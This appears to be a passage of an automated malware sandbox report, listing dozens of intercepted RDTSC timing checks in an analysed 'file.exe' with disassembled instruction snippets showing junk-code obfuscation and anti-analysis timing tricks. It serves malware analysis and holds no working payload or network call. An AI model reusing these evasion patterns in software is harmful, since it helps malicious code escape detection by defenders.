Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC2132 second address: CC21DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFE9222h 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FB97CFE921Eh 0x00000011 nop 0x00000012 jo 00007FB97CFE9216h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FB97CFE9218h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 sub dword ptr [ebp+1248FE50h], esi 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007FB97CFE9218h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 00000018h 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 cld 0x00000057 mov ebx, dword ptr [ebp+122D1FCCh] 0x0000005d xchg eax, esi 0x0000005e jns 00007FB97CFE922Bh 0x00000064 push eax 0x00000065 pushad 0x00000066 jmp 00007FB97CFE921Dh 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC13BA second address: CC13D5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007FB97CFF015Fh 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC2413 second address: CC2418 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC33B9 second address: CC33BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC33BD second address: CC33C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC33C3 second address: CC33C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC33C8 second address: CC33CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC5388 second address: CC53D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB97CFF015Fh 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FB97CFF0161h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 and edi, dword ptr [ebp+122D2AB6h] 0x0000001c push eax 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FB97CFF0164h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC4479 second address: CC44E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FB97CFE9227h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 xor dword ptr [ebp+122D1CCBh], eax 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 movsx ebx, si 0x00000027 and edi, 56743124h 0x0000002d mov eax, dword ptr [ebp+122D0F49h] 0x00000033 mov dword ptr [ebp+122D24FFh], edi 0x00000039 push FFFFFFFFh 0x0000003b nop 0x0000003c ja 00007FB97CFE9224h 0x00000042 push eax 0x00000043 push esi 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC54AA second address: CC558E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF0162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB97CFF015Fh 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 jmp 00007FB97CFF0166h 0x00000017 or dword ptr [ebp+1245F978h], ecx 0x0000001d push dword ptr fs:[00000000h] 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007FB97CFF0158h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 0000001Ah 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e and edi, dword ptr [ebp+122D210Ah] 0x00000044 mov dword ptr fs:[00000000h], esp 0x0000004b movzx edi, cx 0x0000004e mov eax, dword ptr [ebp+122D01A5h] 0x00000054 push 00000000h 0x00000056 push ecx 0x00000057 call 00007FB97CFF0158h 0x0000005c pop ecx 0x0000005d mov dword ptr [esp+04h], ecx 0x00000061 add dword ptr [esp+04h], 0000001Ch 0x00000069 inc ecx 0x0000006a push ecx 0x0000006b ret 0x0000006c pop ecx 0x0000006d ret 0x0000006e xor dword ptr [ebp+122D2E22h], eax 0x00000074 push FFFFFFFFh 0x00000076 sub dword ptr [ebp+122D1EE5h], eax 0x0000007c nop 0x0000007d pushad 0x0000007e jg 00007FB97CFF0160h 0x00000084 jl 00007FB97CFF015Ch 0x0000008a jng 00007FB97CFF0156h 0x00000090 popad 0x00000091 push eax 0x00000092 push eax 0x00000093 push edx 0x00000094 jmp 00007FB97CFF015Ch 0x00000099 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7482 second address: CC7488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7488 second address: CC7492 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB97CFF0156h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC662C second address: CC6632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6632 second address: CC6637 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8413 second address: CC8426 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8426 second address: CC8431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB97CFF0156h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7696 second address: CC769B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC934A second address: CC935B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF015Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC956F second address: CC9591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB97CFE9229h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9664 second address: CC9668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9668 second address: CC966E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA5B7 second address: CCA5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF3FE second address: CCF412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 ja 00007FB97CFE9218h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF412 second address: CCF451 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB97CFF0156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push esi 0x0000000d movsx edi, si 0x00000010 pop edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FB97CFF0158h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d push 00000000h 0x0000002f movzx edi, si 0x00000032 xchg eax, esi 0x00000033 push esi 0x00000034 jbe 00007FB97CFF015Ch 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF451 second address: CCF45D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE554 second address: CCE598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 nop 0x00000009 and di, 118Dh 0x0000000e push dword ptr fs:[00000000h] 0x00000015 movzx edi, dx 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f xor edi, dword ptr [ebp+12480C72h] 0x00000025 mov eax, dword ptr [ebp+122D14C5h] 0x0000002b sbb edi, 15AD559Dh 0x00000031 push FFFFFFFFh 0x00000033 mov dword ptr [ebp+1244FAB8h], esi 0x00000039 nop 0x0000003a pushad 0x0000003b pushad 0x0000003c push esi 0x0000003d pop esi 0x0000003e pushad 0x0000003f popad 0x00000040 popad 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE598 second address: CCE5AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FB97CFE9216h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF5E9 second address: CCF5F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF015Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD07D7 second address: CD07E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73D42 second address: C73D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73D46 second address: C73D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73D4A second address: C73D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FB97CFF0156h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA18E second address: CDA197 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA197 second address: CDA1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 je 00007FB97CFF015Eh 0x0000000d jng 00007FB97CFF0156h 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007FB97CFF0156h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDA1B4 second address: CDA1BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD98E2 second address: CD98E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD98E7 second address: CD9907 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE9224h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jp 00007FB97CFE9216h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD9A43 second address: CD9A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD9A4A second address: CD9A51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD9A51 second address: CD9A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD9B8B second address: CD9B8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D08F second address: C6D0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FB97CFF0156h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D0A0 second address: C6D0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D0A6 second address: C6D0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D0AA second address: C6D0B4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB97CFE9216h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D0B4 second address: C6D0CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB97CFF0161h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D0CD second address: C6D0E0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB97CFE9216h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE06F6 second address: CE06FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE06FA second address: CE0700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0938 second address: CE093C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE093C second address: CE0946 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB97CFE9216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0946 second address: CE094C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE094C second address: CE0950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0950 second address: CE0988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF015Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007FB97CFF0161h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 jc 00007FB97CFF0158h 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push esi 0x00000022 pop esi 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE8D7D second address: CE8D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE8D81 second address: CE8D85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE807A second address: CE809A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB97CFE9216h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB97CFE9224h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE833A second address: CE834C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFF015Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE834C second address: CE835D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE921Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE835D second address: CE8399 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FB97CFF015Ah 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pushad 0x0000000c jl 00007FB97CFF0156h 0x00000012 jmp 00007FB97CFF015Dh 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f jmp 00007FB97CFF015Fh 0x00000024 pop edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE84F8 second address: CE8508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB97CFE921Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE864F second address: CE8655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE87F6 second address: CE8801 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE8BF1 second address: CE8C0D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB97CFF0156h 0x00000008 jmp 00007FB97CFF0162h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE8C0D second address: CE8C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE8C15 second address: CE8C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEBA67 second address: CEBA73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FB97CFE9216h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEFC90 second address: CEFC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEFC94 second address: CEFCBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB97CFE9225h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jp 00007FB97CFE9218h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEFCBC second address: CEFCC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEFCC2 second address: CEFCC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5848 second address: CF5881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jbe 00007FB97CFF0156h 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop edi 0x0000000e jp 00007FB97CFF0162h 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007FB97CFF0156h 0x0000001c jmp 00007FB97CFF0161h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4250 second address: CF425F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FB97CFE9216h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF476C second address: CF4786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFF015Ch 0x00000009 popad 0x0000000a pushad 0x0000000b ja 00007FB97CFF0156h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4786 second address: CF478C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF478C second address: CF4793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4793 second address: CF479D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FB97CFE9216h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF479D second address: CF47A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4A92 second address: CF4A9A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4A9A second address: CF4A9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4A9F second address: CF4ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFE9224h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4ABB second address: CF4ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FB97CFF0156h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4ACF second address: CF4AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4AD3 second address: CF4AE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FB97CFF0156h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4AE1 second address: CF4AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4AE5 second address: CF4AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB97CFF015Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
